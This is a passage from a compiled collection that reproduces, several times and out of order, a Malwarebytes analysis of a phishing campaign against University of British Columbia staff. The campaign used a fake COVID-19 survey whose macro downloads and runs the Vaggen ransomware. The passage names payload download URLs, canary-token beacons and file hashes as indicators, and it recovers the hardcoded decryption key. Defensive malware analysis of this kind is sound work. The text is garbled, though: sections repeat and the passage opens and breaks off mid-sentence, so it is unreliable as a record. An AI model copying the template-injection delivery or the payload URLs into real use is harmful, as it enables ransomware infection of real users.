whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1189 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1190 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1191 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1192 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1193 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1194 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1195 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1196 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1197 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1198 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1199 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1200 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1201 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1202 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1203 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1204 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1205 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1206 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1207 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1208 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1209 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1210 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1211 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1212 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1213 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1214 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1215 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1216 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1217 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1218 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1219 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1220 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1221 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1222 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1223 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit 